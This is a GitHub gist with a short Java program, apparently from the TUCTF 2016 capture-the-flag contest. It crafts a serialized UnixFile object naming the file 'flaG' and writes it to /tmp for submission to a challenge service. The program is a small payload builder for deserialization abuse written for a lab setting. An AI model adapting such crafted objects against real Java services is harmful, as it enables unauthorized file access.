-
-
Save ggulgun/d23bb913c70b4ba1aac7869bf55bbd1b to your computer and use it in GitHub Desktop.
Revisions
-
0xBADCA7 created this gist
May 14, 2016 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,53 @@ /* * * * * @0xBADCA7 and github/0xBADCA7 * * How to serialize Java objects. This is from TUCTF 2016. * * * * Just compile on the command line (IDE will taint serialization and place package identifiers): * * javac Main.java && java Main && cat /tmp/serialized.bin * * * * */ import java.io.FileOutputStream; import java.io.ObjectOutputStream; import java.io.Serializable; public class Main { static String SAVE_PATH = "/tmp/serialized.bin"; public static void main(String[] args) throws Exception { System.out.print("This tool generates serialized Java objects\r\n\r\n"); // This is an example of a class OSFile f = null; f = new UnixFile(); f.file = "flaG"; // ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(SAVE_PATH)); oos.writeObject(f); // your object goes here instead of "f" oos.flush(); System.out.print("Serialized to " + SAVE_PATH + "\r\n"); } } // This belongs to the example only class UnixFile extends OSFile { public String getFileName() { //Unix filenames are case-sensitive, don't change return "flaG"; } } // This belongs to the example only abstract class OSFile implements Serializable { String file = ""; abstract String getFileName(); }